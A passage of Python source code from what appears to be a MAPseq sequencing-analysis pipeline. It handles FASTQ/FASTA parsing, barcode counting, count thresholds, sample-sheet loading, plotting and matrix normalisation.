[ list(t) for t in zip(readlist, alignlist)]\n return edgelist\n\ndef get_components(edgelist):\n complist = []\n logging.debug(f'getting connected components from edgelist len={len(edgelist)}')\n if len(edgelist) < 100:\n logging.debug(f'{edgelist}')\n for g in tarjan(from_edges(edgelist)):\n complist.append(g)\n logging.debug(f'{len(complist)} components.')\n if len(edgelist) < 100:\n logging.debug(f'{complist}')\n return complist\n\n#\n# Tarjan's algorithm, same as Matlab graphconncomp() \n# https://rosettacode.org/wiki/Tarjan#Python:_As_function\n#\ndef from_edges(edges): \n class Node:\n def __init__(self):\n # root is one of:\n # None: not yet visited\n # -1: already processed\n # non-negative integer: what Wikipedia pseudo code calls 'lowlink'\n self.root = None\n self.succ = []\n\n nodes = defaultdict(Node)\n for v,w in edges:\n nodes[v].succ.append(nodes[w])\n\n for i,v in nodes.items(): # name the nodes for final output\n v.id = i\n\n return nodes.values()\n \n \ndef tarjan(V):\n '''\n May get recursion limit errors if input is large. \n https://stackoverflow.com/questions/5061582/setting-stacksize-in-a-python-script/16248113#16248113\n \n import resource, sys\n resource.setrlimit(resource.RLIMIT_STACK, (2**29,-1))\n sys.setrecursionlimit(10**6)\n '''\n def strongconnect(v, S):\n v.root = pos = len(S)\n S.append(v)\n\n for w in v.succ:\n if w.root is None: # not yet visited\n yield from strongconnect(w, S)\n\n if w.root >= 0: # still on stack\n v.root = min(v.root, w.root)\n\n if v.root == pos: # v is the root, return everything above\n res, S[pos:] = S[pos:], []\n for w in res:\n w.root = -1\n yield [r.id for r in res]\n\n for v in V:\n if v.root is None:\n yield from strongconnect(v, [])\n\ndef make_counts_df(config, seqdf, label=None):\n '''\n input dataframe with 'sequence' column\n make counts column for identical sequences. \n optionally assign a label to set in new column\n \n '''\n logging.debug(f'seqdf=\\n{seqdf}')\n ser = seqdf['sequence'].value_counts()\n df = pd.DataFrame(columns=['sequence','counts'])\n df['sequence'] = ser.index\n df['counts'] = ser.values\n logging.debug(f'counts df = \\n{df}')\n if label is not None:\n df['label'] = label\n return df\n\n\ndef make_fasta_df(config, infile, ignore_n=True):\n '''\n input fasta \n ignore 'N' sequences.\n ''' \n slist = []\n rcs = SeqIO.parse(infile, \"fasta\")\n handled = 0\n for sr in rcs:\n s = sr.seq\n if ('N' in sr) and ignore_n :\n pass\n else:\n slist.append(str(s))\n handled += 1 \n logging.debug(f\"kept {len(slist)} sequences out of {handled}\") \n df = pd.DataFrame(slist, columns=['sequence'] )\n return df\n\n\ndef trim_fasta(config, infile, outdir=None, length=44):\n filepath = os.path.abspath(infile) \n dirname = os.path.dirname(filepath)\n if outdir is not None:\n dirname = os.path.abspath(outdir)\n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename)\n head = filename.split('.')[0] \n logging.debug(f'handling {filepath}')\n \n ofpath = f'{dirname}/{head}.{length}.fasta'\n logging.debug(f'opening {ofpath}...')\n outfile = open(ofpath, 'w') \n trimmed = []\n sfa = SeqIO.parse(filepath, \"fasta\")\n for sr in sfa:\n tseq = sr.seq[:length]\n tsr = SeqRecord( tseq, id=sr.id, name=sr.name, description=sr.description)\n trimmed.append(tsr)\n SeqIO.write(trimmed, outfile, 'fasta')\n logging.debug(f'wrote {len(trimmed)} to {ofpath}')\n return ofpath\n\n\ndef cumulative_fract_idx_naive(ser, fract):\n '''\n value at index of row that marks cumulative fraction of total. \n assumes series sorted in descending order. \n starts with largest value. \n '''\n sum_total = ser.sum()\n fraction_int = int(fract * sum_total)\n cum_total = 0\n val = 0\n idx = 0\n for idx in range(0, len(ser)):\n val = ser[idx]\n cum_total = cum_total + val\n fraction = cum_total / sum_total\n if cum_total > fraction_int:\n break\n else:\n logging.debug(f'at idx={idx} fraction is {fraction}')\n logging.debug(f'val={val} idx={idx} cum_total={cum_total} ')\n return val \n \n\ndef cumulative_fract_idx(ser, fract):\n '''\n value at index of row that marks cumulative fraction of total. \n assumes series sorted in descending order. \n starts with largest value. \n '''\n sum_total = ser.sum()\n fraction_int = int(fract * sum_total)\n cumsum = ser.cumsum()\n ltser = cumsum[cumsum < fraction_int]\n if len(ltser) < 1:\n idx = 0\n val = cumsum\n else:\n idx = ltser.index[-1]\n val = ser[idx]\n logging.debug(f'val={val} idx={idx} ')\n return val \n\ndef calc_kneed_idx(x, y , inflect, poly=2, sense=4):\n '''\n assumes convex, then concave, decreasing curve.\n inflect = 'knee'|'elbow'\n \n '''\n if inflect == 'knee':\n kl = KneeLocator(x=x, y=y, S=sense, curve='convex',direction='decreasing',interp_method='polynomial',polynomial_degree=poly)\n val = kl.knee\n logging.debug(f'got value {val} for knee from kneed...')\n elif inflect == 'elbow':\n # not validated!\n kl = KneeLocator(x=x, y=y, S=sense, curve='convex',direction='decreasing',interp_method='polynomial',polynomial_degree=poly) \n val = kl.elbow\n logging.debug(f'got value {val} for knee from kneed...')\n return val\n\n\n\ndef calc_final_thresholds(config, threshdf):\n '''\n take threshold df for all sites, and derive final thresholds df for\n \n threshdf columns used: site count_threshold \n \n target_threshold = 100\n target-control_threshold = 1000\n target-negative_threshold = 100\n target-lone_threshold = 100\n injection_threshold = 2\n injection-control_threshold=2\n \n \n 'site' 'threshold'\n \n \n '''\n tdf = pd.concat( [threshdf[threshdf['site'] == 'target-negative'], \n threshdf[threshdf['site'] == 'target']] )\n idf = threshdf[threshdf['site'] == 'injection']\n \n target_thresh = int(tdf['count_threshold'].min())\n inj_thresh = int(idf['count_threshold'].min())\n\n finaldf = pd.DataFrame( data=[ ['target', target_thresh ],['injection', inj_thresh] ], \n columns= ['site','threshold'] )\n \n return finaldf\n \n\n\n\n\ndef calc_thresholds_all(config, sampdf, filelist, fraction=None ):\n '''\n reads in all counts.df (assumes counts column).\n \n calculates thresholds for 'target' and 'injection'\n \n returns 2 dfs. one general info, one with final thresholds\n '''\n if fraction is not None:\n config.set('ssifasta','count_threshold_fraction', fraction)\n \n outlist = []\n \n for filename in filelist:\n logging.debug(f'handling {filename}') \n (rtprimer, site, brain, region) = guess_site(filename, sampdf)\n cdf = pd.read_csv(filename ,sep='\\t', index_col=0)\n (count_threshold, label, clength, counts_max, counts_min) = calculate_threshold(config, cdf, site )\n outlist.append( [rtprimer, site, count_threshold, label, clength, counts_max, counts_min ])\n threshdf = pd.DataFrame(data=outlist, columns=['rtprimer', 'site', 'count_threshold', 'label', 'counts_length', 'counts_max', 'counts_min' ])\n finaldf = calc_final_thresholds(config, threshdf) \n \n return (finaldf, threshdf)\n \n \n\ndef calculate_threshold(config, cdf, site=None):\n '''\n takes counts dataframe (with 'counts' column) \n if 'label', use that. \n and calculates 'shoulder' threshold\n site = ['control','injection','target'] \n Will use relevant threshold. If None, will use default threshold\n \n target_threshold=100\n target_ctrl_threshold=1000\n inj_threshold=2\n inj_ctrl_threshold=2\n \n '''\n count_pct = float(config.get('ssifasta','count_threshold_fraction'))\n min_threshold = int(config.get('ssifasta','count_threshold_min'))\n label = 'BCXXX'\n \n try:\n label = cdf['label'].unique()[0]\n except:\n logging.warn(f'no SSI label in DF')\n \n # assess distribution.\n counts = cdf['counts']\n clength = len(counts)\n counts_max = counts.max()\n counts_min = counts.min()\n counts_mean = counts.mean()\n logging.info(f'handling {label} length={clength} max={counts_max} min={counts_min} ')\n \n val = cumulative_fract_idx(counts, count_pct)\n if val < min_threshold:\n logging.warning(f'calc threshold < min...')\n else:\n logging.debug(f'calculated count threshold={val} for SSI={label}')\n count_threshold=max(val, min_threshold)\n \n \n #if site is None:\n # count_threshold = int(config.get('ssifasta', 'default_threshold'))\n #else:\n # count_threshold = int(config.get('ssifasta', f'{site}_threshold'))\n #logging.debug(f'count threshold for {site} = {count_threshold}')\n return (count_threshold, label, clength, counts_max, counts_min)\n\n\n\ndef calculate_threshold_kneed(config, cdf, site=None, inflect=None ):\n '''\n takes counts dataframe (with 'counts' column) \n if 'label', use that. \n and calculates 'knee' or 'elbow' threshold\n site = ['control','injection','target'] \n Will use relevant threshold. If None, will use default threshold\n \n target_threshold=100\n target_ctrl_threshold=1000\n inj_threshold=2\n inj_ctrl_threshold=2\n \n '''\n if inflect is None:\n inflect = config.get('ssifasta','threshold_heuristic')\n min_threshold = int(config.get('ssifasta','count_threshold_min'))\n label = 'BCXXX'\n \n try:\n label = cdf['label'].unique()[0]\n except:\n logging.warn(f'no SSI label in DF')\n \n # assess distribution.\n counts = cdf['counts']\n clength = len(counts)\n counts_max = counts.max()\n counts_min = counts.min()\n counts_mean = counts.mean()\n logging.info(f'handling {label} length={clength} max={counts_max} min={counts_min} ')\n \n val = calc_kneed_idx(cdf.index, cdf.counts, inflect='knee' )\n if val < min_threshold:\n logging.warning(f'kneed calc threshold < min...')\n else:\n logging.debug(f'calculated count threshold={val} for SSI={label}')\n count_threshold=max(val, min_threshold)\n \n #if site is None:\n # count_threshold = int(config.get('ssifasta', 'default_threshold'))\n #else:\n # count_threshold = int(config.get('ssifasta', f'{site}_threshold'))\n #logging.debug(f'count threshold for {site} = {count_threshold}')\n return (count_threshold, label, clength, counts_max, counts_min)\n\n\ndef calc_min_target(config, braindf):\n '''\n how many molecules (unique UMIs) are in supposedly target-negative area?\n '''\n countlist = []\n min_target = 0\n braindf['counts'] = braindf['counts'].astype(int)\n tndf = braindf[ braindf['site'] == 'target-negative']\n tndf = tndf[ tndf['type'] == 'real']\n lablist = list(tndf['label'].dropna().unique())\n for label in lablist:\n ldf = tndf[tndf['label'] == label]\n if len(ldf) > 0:\n countslist.append( ldf['counts'].sum())\n if len(countslist) > 0:\n min_target = max(countslist)\n logging.debug(f'calculated min_target={min_target}')\n return min_target\n\n\ndef get_threshold(config, cdf, site=None):\n '''\n site = ['control','injection','target'] \n Will use relevant threshold. If None, will use default threshold\n \n target_threshold=100\n target_ctrl_threshold=1000\n inj_threshold=2\n inj_ctrl_threshold=2\n \n '''\n count_threshold=2\n if site is None:\n count_threshold = int(config.get('ssifasta', 'default_threshold'))\n else:\n count_threshold = int(config.get('ssifasta', f'{site}_threshold'))\n logging.debug(f'count threshold for {site} = {count_threshold}')\n return count_threshold\n\n\ndef calc_freq_threshold(df, fraction, column):\n '''\n sorts column of input column\n calculates index of point at which of data points are less \n returns column value at that point. \n '''\n ser = df[column].copy()\n ser.sort_values(ascending = False, inplace=True)\n return 122\n\n\ndef threshold_counts(config, df, threshold=None):\n '''\n \n '''\n logging.debug(f'threshold counts threshold={threshold}')\n threshold= int(threshold) \n df = df[df['counts'] >= threshold].copy()\n return df\n\n\ndef filter_low_complexity(config, seqdf):\n return seqdf\n\n\ndef split_spike_real_lone_barcodes(config, df):\n '''\n df has sequence counts\n should be length 32 ( 30 + YY ) Y= C or T\n \n '''\n # df[df[\"col\"].str.contains(\"this string\")==False]\n sire = config.get('ssifasta', 'spikeinregex')\n realre = config.get('ssifasta','realregex')\n lonere = config.get('ssifasta', 'loneregex')\n \n logging.debug(f'before filtering: {len(df)}') \n logging.debug(f\"spike-in regex = '{sire}' \")\n simap = df['sequence'].str.contains(sire, regex=True) == True\n \n spikedf = df[simap]\n spikedf.reset_index(inplace=True, drop=True)\n \n remaindf = df[~simap]\n logging.debug(f'spikeins={len(spikedf)} remaindf={len(remaindf)}')\n \n # split real/L1\n logging.debug(f\"realre = '{realre}' lonere = '{lonere}' \")\n realmap = remaindf['sequence'].str.contains(realre, regex=True) == True\n realdf = remaindf[realmap]\n realdf.reset_index(inplace=True, drop=True)\n \n lonemap = remaindf['sequence'].str.contains(lonere, regex=True) == True \n lonedf = remaindf[lonemap]\n lonedf.reset_index(inplace=True, drop=True)\n logging.info(f'initial={len(df)} spikeins={len(spikedf)} real={len(realdf)} lone={len(lonedf)}') \n return (spikedf, realdf, lonedf)\n\n\ndef load_sample_info(config, file_name):\n #\n # Parses Excel spreadsheet to get orderly sample metadata, saves as sampleinfo.tsv. \n # OR Reads in sampleinfo.tsv\n # Assumes various properties of spreadsheet that need to stay static. \n #\n # ['Tube # by user', 'Our Tube #', 'Sample names provided by user',\n # 'Site information', 'RT primers for MAPseq', 'Brain ', 'Column#']\n #\n # If brain is not given, or is empty, all are set to 'brain1'. \n # If region is not given, or is empty, all are set to \n # \n \n # Mappings for excel columns. \n sheet_to_sample = {\n 'Tube # by user' : 'usertube', \n 'Our Tube #' : 'ourtube', \n 'Sample names provided by user' : 'samplename', \n 'Site information' : 'siteinfo',\n 'RT primers for MAPseq' : 'rtprimer',\n 'Brain' : 'brain',\n 'Region' : 'region',\n }\n \n sample_columns = ['usertube', 'ourtube', 'samplename', 'siteinfo', 'rtprimer', 'brain', 'region'] \n int_sample_col = ['usertube', 'ourtube', 'rtprimer'] # brain is often not a number. \n str_sample_col = ['usertube', 'ourtube', 'samplename', 'siteinfo', 'rtprimer', 'brain' ,'region']\n\n if file_name.endswith('.xlsx'):\n sheet_name = 'Sample information'\n edf = pd.read_excel(file_name, sheet_name=sheet_name, header=1) \n sdf = pd.DataFrame()\n \n for ecol in edf.columns:\n ecol_stp = ecol.strip() \n try:\n # map using stripped column name, retrieve using actual excel column name\n # which may have trailing spaces...\n scol = sheet_to_sample[ecol_stp]\n logging.debug(f'found mapping {ecol} -> {scol}')\n cser = edf[ecol]\n logging.debug(f'column for {scol}:\\n{cser}')\n sdf[scol] = cser\n \n except KeyError:\n logging.debug(f'no mapping for {ecol} continuing...')\n \n except Exception as ex:\n logging.error(f'error while handling {ecol} ')\n logging.warning(traceback.format_exc(None))\n\n #sdf[sample_columns[i]] = pd.Series(np.nan, np.arange(len(edf))) \n for scol in sample_columns:\n try:\n ser = sdf[scol]\n except KeyError as ke:\n logging.warn(f'no column {scol}, required. Creating...')\n if scol == 'samplename':\n sdf[scol] = sdf['ourtube']\n \n sdf.replace(r'^s*$', float('NaN'), regex = True, inplace=True)\n sdf.dropna(how='all', axis=0, inplace=True) \n sdf = fix_columns_int(sdf, columns=int_sample_col)\n sdf = fix_columns_str(sdf, columns=str_sample_col)\n\n elif file_name.endswith('.tsv'):\n sdf = pd.read_csv(file_name, sep='\\t', index_col=0, keep_default_na=False, dtype =str, comment=\"#\")\n #df.fillna(value='', inplace=True)\n sdf = sdf.astype('str', copy=False) \n sdf = fix_columns_int(sdf, columns=int_sample_col)\n else:\n logging.error(f'file {file_name} neither .xlsx or .tsv')\n sdf = None\n \n logging.debug(f'created reduced sample info df:\\n{sdf}')\n return sdf\n\n\ndef merge_fastq_pairs(config, readfilelist, outdir):\n logging.debug(f'processing {readfilelist}')\n if outdir is None:\n outdir = \".\"\n else:\n if not os.path.exists(outdir):\n os.makedirs(outdir, exist_ok=True)\n logging.debug(f'made outdir={outdir}')\n pairshandled = 0\n for (read1file, read2file) in readfilelist:\n logging.debug(f'read1file = {read1file}')\n logging.debug(f'read2file = {read2file}')\n pairshandled += 1 \n\n\n \n\ndef process_fastq_pairs(config, sampdf, readfilelist, bclist, outdir, force=False, countsplots=True):\n\n # if all the output files for bclist exist, don't recalc unless force=True. \n if outdir is None:\n outdir = \".\"\n else:\n if not os.path.exists(outdir):\n os.makedirs(outdir, exist_ok=True)\n logging.debug(f'made outdir={outdir}')\n output_exists = check_output(bclist)\n logging.debug(f'output_exists={output_exists} force={force}')\n \n if ( not output_exists ) or force:\n outfile = os.path.abspath(f'{outdir}/unmatched.fasta')\n pairedfile = os.path.abspath(f'{outdir}/paired.txt')\n umf = open(outfile, 'w')\n pf = open(pairedfile, 'w')\n r1s = int(config.get('fastq','r1start'))\n r1e = int(config.get('fastq','r1end'))\n r2s = int(config.get('fastq','r2start'))\n r2e = int(config.get('fastq','r2end'))\n \n seqhandled_interval = int(config.get('fastq','seqhandled_interval')) \n matched_interval = int(config.get('fastq','matched_interval'))\n unmatched_interval = int(config.get('fastq','unmatched_interval'))\n\n seqshandled = 0\n pairshandled = 0\n unmatched = 0\n didmatch = 0\n \n #\n # handle pairs of readfiles from readfilelist\n #\n for (read1file, read2file) in readfilelist:\n pairshandled += 1\n logging.debug(f'handling file pair {pairshandled}')\n if read1file.endswith('.gz'):\n read1file = gzip.open(read1file, \"rt\")\n if read2file.endswith('.gz'):\n read2file = gzip.open(read2file, \"rt\") \n \n recs1 = SeqIO.parse(read1file, \"fastq\")\n recs2 = SeqIO.parse(read2file, \"fastq\")\n \n while True:\n try:\n r1 = next(recs1)\n r2 = next(recs2)\n sub1 = r1.seq[r1s:r1e]\n sub2 = r2.seq[r2s:r2e]\n fullread = sub1 + sub2\n pf.write(f'{fullread}\\n')\n \n matched = False\n for bch in bclist:\n r = bch.do_match(seqshandled, fullread)\n if r:\n didmatch += 1\n if didmatch % matched_interval == 0:\n logging.debug(f'match {didmatch}: found SSI {bch.label} in {fullread}!')\n matched = True\n break\n if not matched:\n unmatched += 1\n if unmatched % unmatched_interval == 0:\n logging.debug(f'{unmatched} unmatched so far.')\n id = str(seqshandled)\n sr = SeqRecord( fullread, id=id, name=id, description=id)\n SeqIO.write([sr], umf, 'fasta')\n \n seqshandled += 1\n if seqshandled % seqhandled_interval == 0: \n logging.info(f'handled {seqshandled} reads from pair {pairshandled}. matched={didmatch} unmatched={unmatched}')\n \n except StopIteration as e:\n logging.debug(f'iteration stopped')\n break\n \n \n umf.close()\n pf.close()\n for bch in bclist:\n bch.finalize() \n # close possible gzip filehandles??\n #max_mismatch = bclist[0].max_mismatch\n logging.info(f'handled {seqshandled} sequences. {pairshandled} pairs. {didmatch} matched. {unmatched} unmatched')\n else:\n logging.warn('all output exists and force=False. Not recalculating.')\n \n filelist = []\n for bch in bclist:\n filelist.append(bch.filename)\n logging.info(f'Making counts df for {filelist} in {outdir}')\n make_counts_dfs(config, filelist, outdir)\n\n # by default make countsplots \n if countsplots:\n logging.info('Making combined countsplots PDF...')\n countsfilelist = []\n for bch in bclist:\n dirname = os.path.dirname(bch.filename)\n filename = os.path.basename(bch.filename)\n (base, ext) = os.path.splitext(filename) \n of = os.path.join(dirname , f'{base}.44.counts.tsv')\n countsfilelist.append(of)\n make_countsplot_combined_sns(config, sampdf, countsfilelist, outdir=outdir, expid=None )\n\n\n\ndef calc_thread_count(nthreads):\n ncpus = os.cpu_count()\n threads = 1 # safe default\n if nthreads > 1:\n # use nthreads CPUS up to ncpus.\n threads = min(nthreads, ncpus)\n logging.debug(f'nthreads positive. use {threads}') \n elif nthreads < 0:\n # use all but -N CPUs\n threads = ncpus - abs(nthreads)\n threads = max(threads, 1)\n logging.debug(f'nthreads negative. Use all but {abs(nthreads)}')\n else:\n # ntrheads is 0\n logging.debug(f'nthreads = 0, use all CPUS: {ncpus}')\n threads = ncpus\n return (ncpus, threads)\n\n\ndef process_fastq_pairs_parallel(config, readfilelist, bclist, outdir, nthreads, force=False):\n '''\n \n nthreads: use this number of CPUs. 0 means all. -1 means all but 1. 3 means 3. \n \n '''\n ncpus, threads = calc_thread_count(nthreads) \n logging.info(f'using {threads} of {ncpus} CPUs in parallel...')\n\n prog = os.path.expanduser('~/git/mapseq-processing/scripts/process_fastq_thread.py')\n readfilestr = \"\"\n for (a,b) in readfilelist:\n readfilestr += f\" {a} {b} \"\n \n logging.debug(f'readfilestr = {readfilestr}')\n \n # from cshlwork.utils import JobRunner, JobStack, JobSet\n \n jstack = JobStack()\n \n for bco in bclist:\n cmd = [ prog, \n '-d',\n '-B', bco.label , \n '-O' , outdir ,\n readfilestr \n ]\n jstack.addjob(cmd)\n jset = JobSet(max_processes = threads, jobstack = jstack)\n jset.runjobs()\n \n \n filelist = []\n for bco in bclist:\n filelist.append(bco.filename)\n logging.info(f'Making counts df for {filelist} in {outdir}')\n make_counts_dfs(config, filelist, outdir)\n\n\ndef process_fastq_pairs_single(config, readfilelist, bclist, outdir, force=False):\n\n # if all the output files for bclist exist, don't recalc unless force=True. \n if outdir is None:\n outdir = \".\"\n else:\n if not os.path.exists(outdir):\n os.makedirs(outdir, exist_ok=True)\n logging.debug(f'made outdir={outdir}')\n output_exists = check_output(bclist)\n logging.debug(f'output_exists={output_exists} force={force}')\n \n # list should have only one...\n bcho = bclist[0]\n \n if ( not output_exists ) or force:\n #outfile = os.path.abspath(f'{outdir}/unmatched.fasta')\n #pairedfile = os.path.abspath(f'{outdir}/paired.txt')\n #umf = open(outfile, 'w')\n #pf = open(pairedfile, 'w')\n r1s = int(config.get('fastq','r1start'))\n r1e = int(config.get('fastq','r1end'))\n r2s = int(config.get('fastq','r2start'))\n r2e = int(config.get('fastq','r2end'))\n \n seqhandled_interval = int(config.get('fastq','seqhandled_interval')) \n matched_interval = int(config.get('fastq','matched_interval'))\n unmatched_interval = int(config.get('fastq','unmatched_interval'))\n\n seqshandled = 0\n pairshandled = 0\n unmatched = 0\n didmatch = 0\n \n #\n # handle pairs of readfiles from readfilelist\n #\n for (read1file, read2file) in readfilelist:\n pairshandled += 1\n logging.debug(f'handling file pair {pairshandled}')\n if read1file.endswith('.gz'):\n read1file = gzip.open(read1file, \"rt\")\n if read2file.endswith('.gz'):\n read2file = gzip.open(read2file, \"rt\") \n \n recs1 = SeqIO.parse(read1file, \"fastq\")\n recs2 = SeqIO.parse(read2file, \"fastq\")\n \n while True:\n try:\n r1 = next(recs1)\n r2 = next(recs2)\n sub1 = r1.seq[r1s:r1e]\n sub2 = r2.seq[r2s:r2e]\n fullread = sub1 + sub2\n #pf.write(f'{fullread}\\n')\n \n matched = False\n r = bcho.do_match(seqshandled, fullread)\n if r:\n didmatch += 1\n if didmatch % matched_interval == 0:\n logging.debug(f'match {didmatch}: found SSI {bcho.label} in {fullread}!')\n matched = True\n else:\n unmatched += 1\n # when processing single, unmatched number not useful. \n #if unmatched % unmatched_interval == 0:\n # logging.debug(f'{unmatched} unmatched so far.')\n #id = str(seqshandled)\n #sr = SeqRecord( fullread, id=id, name=id, description=id)\n #SeqIO.write([sr], umf, 'fasta')\n \n seqshandled += 1\n if seqshandled % seqhandled_interval == 0: \n logging.debug(f'handled {seqshandled} reads from pair {pairshandled}. matched={didmatch} unmatched={unmatched}')\n \n except StopIteration as e:\n logging.debug(f'iteration stopped?')\n logging.warning(traceback.format_exc(None))\n break\n \n #umf.close()\n #pf.close()\n #for bch in bclist:\n bcho.finalize() \n # close possible gzip filehandles??\n #max_mismatch = bclist[0].max_mismatch\n logging.info(f'handled {seqshandled} sequences. {pairshandled} pairs. {didmatch} matched. {unmatched} unmatched')\n else:\n logging.warn('all output exists and force=False. Not recalculating.')\n \n\ndef make_counts_dfs(config, filelist, outdir):\n '''\n \n '''\n dflist = []\n for filepath in filelist:\n logging.debug(f'calculating counts for file {filepath} ...') \n dirname = os.path.dirname(filepath)\n \n if outdir is not None:\n dirname = outdir\n \n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename) \n logging.debug(f'handling {filepath} base={base}')\n \n # make raw fasta TSV of barcode-splitter output for one barcode. \n # trim to 44 unique w/ counts. \n seqdf = make_fasta_df(config, filepath)\n of = os.path.join(dirname , f'{base}.44.seq.tsv')\n seqdf.to_csv(of, sep='\\t')\n \n # to calculate threshold we need counts calculated. \n cdf = make_counts_df(config, seqdf, label=base) \n logging.debug(f'initial counts df {len(cdf)} all reads.')\n of = os.path.join(dirname , f'{base}.44.counts.tsv')\n cdf.to_csv(of, sep='\\t')\n dflist.append(cdf)\n logging.debug(f'returning list of {len(dflist)} counts DFs...')\n return dflist \n \n\ndef make_clustered_heatmap(df, outprefix, columns=None ):\n '''\n \n Caller should edit columns in order to exclude injection areas from plot. \n '''\n camp = 'Reds'\n g = sns.clustermap(df, cmap=camp, yticklabels=False, col_cluster=False, standard_scale=0)\n g.fig.subplots_adjust(right=0.7)\n g.ax_cbar.set_position((0.8, .2, .03, .4))\n plt.title(f'{prefix}\\nCounts')\n plt.savefig(f'{outprefix}.heatmap.pdf')\n logging.info(f'done making {outprefix}.heatmap.pdf ')\n \n\ndef make_countsplots(config, filelist ): \n '''\n makes individual read counts plots from 44.counts.tsv files. \n \n ''' \n for bcfile in filelist:\n logging.debug(f'handling {bcfile}')\n filepath = os.path.abspath(bcfile) \n dirname = os.path.dirname(filepath) \n filename = os.path.basename(filepath)\n (base, ext) = os.path.splitext(filename)\n base = base.split('.')[0] \n \n bcdata = pd.read_csv(bcfile, sep='\\t')\n plt.figure()\n plt.plot(np.log10(bcdata['Unnamed: 0']), np.log10(bcdata['counts']))\n plt.title(base)\n plt.xlabel(\"log10(BC index)\")\n plt.ylabel(\"log10(BC counts)\")\n plt.savefig(bcfile.replace('tsv', 'pdf'))\n\n\ndef counts_axis_plot_sns(ax, bcdata, labels):\n '''\n Creates individual axes for single plot within figure. \n \n '''\n bcdata['log10index'] = np.log10(bcdata.index)\n bcdata['log10counts'] = np.log10(bcdata['counts'])\n sns.lineplot(ax=ax, x=bcdata['log10index'], y=bcdata['log10counts'] )\n s = bcdata.counts.sum()\n n = len(bcdata)\n t = bcdata.counts.max()\n \n\n title = f\"{bcdata['label'][0]}\" \n ax.set_title(title, fontsize=10)\n ax.text(0.15, 0.2, f\"site={labels['site']}\\nn={n}\\ntop={t}\\nsum={s}\\nthreshold={labels['threshold']}\", fontsize=9) #add text\n \n #sns.move_legend(ax, \"lower left\")\n #ax.set_xlabel(\"log10(BC index)\", fontsize=5)\n #ax.set_ylabel(\"log10(BC counts)\",fontsize=5)\n\n\ndef make_countsplot_combined_sns(config, sampdf, filelist, outdir, expid=None ): \n '''\n makes combined figure with all plots. \n assumes column 'label' for title. \n \n '''\n min_ssi_count = int(config.get('analysis','min_ssi_count')) \n \n from matplotlib.backends.backend_pdf import PdfPages as pdfpages\n \n outfile = 'countsplots.pdf'\n if expid is not None:\n outfile = f'{expid}_{outfile}'\n outfile = os.path.join(outdir, outfile)\n \n # do nine per figure...\n page_dims = (11.7, 8.27)\n with pdfpages(outfile) as pdfpages:\n #fig_n = math.ceil( math.sqrt(len(filelist)) )\n #fig, axes = plt.subplots(nrows=fig_n, ncols=fig_n, figsize=a4_dims, layout='constrained')\n plots_per_page = 9\n num_figs = float(len(filelist)) / float(plots_per_page)\n if num_figs % 9 == 0:\n num_figs = int(num_figs)\n else:\n num_figs = int(num_figs) + 1\n logging.debug(f'with {plots_per_page} plots/page, need {num_figs} for {len(filelist)} file plots.')\n \n figlist = []\n axlist = []\n for i in range(0,num_figs):\n fig,axes = plt.subplots(nrows=3, ncols=3, figsize=page_dims, layout='constrained') \n if expid is not None:\n fig.suptitle(f'{expid} read counts frequency plots.')\n else:\n fig.suptitle(f'Read counts frequency plots')\n figlist.append(fig)\n # numpy.flatirator doesn't handle indexing\n for a in axes.flat:\n axlist.append(a)\n logging.debug(f'created {len(figlist)} figures to go on {num_figs} pages. ')\n \n #fig.set_xlabel(\"log10(BC index)\")\n #fig.set_ylabel(\"log10(BC counts)\")\n filelist = natsorted(filelist)\n logging.debug(f'handling {len(filelist)} files...') \n for i, bcfile in enumerate(filelist):\n logging.debug(f'handling {bcfile}')\n bcdata = pd.read_csv(bcfile, sep='\\t')\n if len(bcdata) > min_ssi_count:\n (rtprimer_num, site, brain, region ) = guess_site(bcfile, sampdf ) \n count_threshold, label, clength, counts_max, counts_min = calculate_threshold(config, bcdata)\n labels = {'rtprimer':rtprimer_num,\n 'site':site,\n 'brain':brain,\n 'region': region,\n 'threshold' : count_threshold\n }\n \n ax = axlist[i]\n counts_axis_plot_sns(ax, bcdata, labels=labels)\n else:\n ax = axlist[i]\n # make empty axis?\n \n for f in figlist:\n pdfpages.savefig(f)\n logging.info(f'saved plot PDF to {outfile}')\n \n\n\n\ndef normalize_weight(df, weightdf, columns=None):\n '''\n Weight values in realdf by spikedf\n Assumes matrix index is sequence.\n Assumes matrices have same columns!! \n If column numbers are mis-matched, will create empty column\n If columns is none, use/weight all columns, otherwise ignore unlisted columns\n \n '''\n logging.debug(f'normalizing df=\\n{df}\\nby weightdf=\\n{weightdf}')\n \n # sanity checks, fixes. \n if len(df.columns) != len(weightdf.columns):\n logging.error(f'mismatched matrix columns df:{len(df.columns)} weightdf: {len(weightdf.columns)} !!')\n \n #which SSI has highest spikein?\n sumlist = []\n for col in weightdf.columns:\n sum = weightdf[col].sum()\n sumlist.append(sum)\n sum_array = np.array(sumlist)\n maxidx = np.argmax(sum_array)\n maxval = sum_array[maxidx] \n maxcol = weightdf.columns[maxidx]\n logging.debug(f'largest spike sum for {maxcol} sum()={maxval}')\n factor_array = maxval / sum_array\n logging.debug(f'factor array= {list(factor_array)}')\n\n max_list = []\n sum_list = []\n for col in df.columns:\n max_list.append(df[col].max())\n sum_list.append(df[col].sum())\n logging.debug(f'real max_list={max_list}')\n logging.debug(f'real sum_list={sum_list}')\n \n normdf = df.copy()\n for i, col in enumerate(normdf.columns):\n logging.debug(f'handling column {col} idx {i} * factor={factor_array[i]}')\n normdf[col] = (normdf[col] * factor_array[i] ) \n\n max_list = []\n sum_list = []\n for col in normdf.columns:\n max_list.append(normdf[col].max())\n sum_list.append(normdf[col].sum())\n logging.debug(f'norm max_list={max_list}')\n logging.debug(f'norm sum_list={sum_list}')\n\n return normdf\n\n\ndef normalize_scale(df, columns = None, logscale='log2', min=0.0, max=1.0):\n '''\n Log scale whole matrix. log10 or log2 ???\n Set -inf to 0\n Set NaN to 0\n \n '''\n #logging.debug(f'making rows sum to one...')\n if logscale == 'log2':\n ldf = np.log2(df)\n elif logscale == 'log10':\n ldf = np.log10(df)\n \n for c in ldf.columns:\n ldf[c] = np.nan_to_num(ldf[c], neginf=0.0)\n return ldf\n\n\ndef sync_columns(df1, df2, fillval=0.0):\n '''\n If two DFs don't have same columns, add empty columns to make the same. \n Note columns may be missing in either DF, so number of columns is not enough to compare...\n '''\n x = set(df1.columns)\n y = set(df2.columns)\n w = x.difference(y) # columns to be added to df2\n z = y.difference(x) # columns to be added to df1 \n\n # only process if there is a problem...\n if len(w) > 0 or len(z) > 0:\n logging.debug('mismatched matrix columns, fixing..')\n for c in w:\n df2[c] = fillval\n for c in z:\n 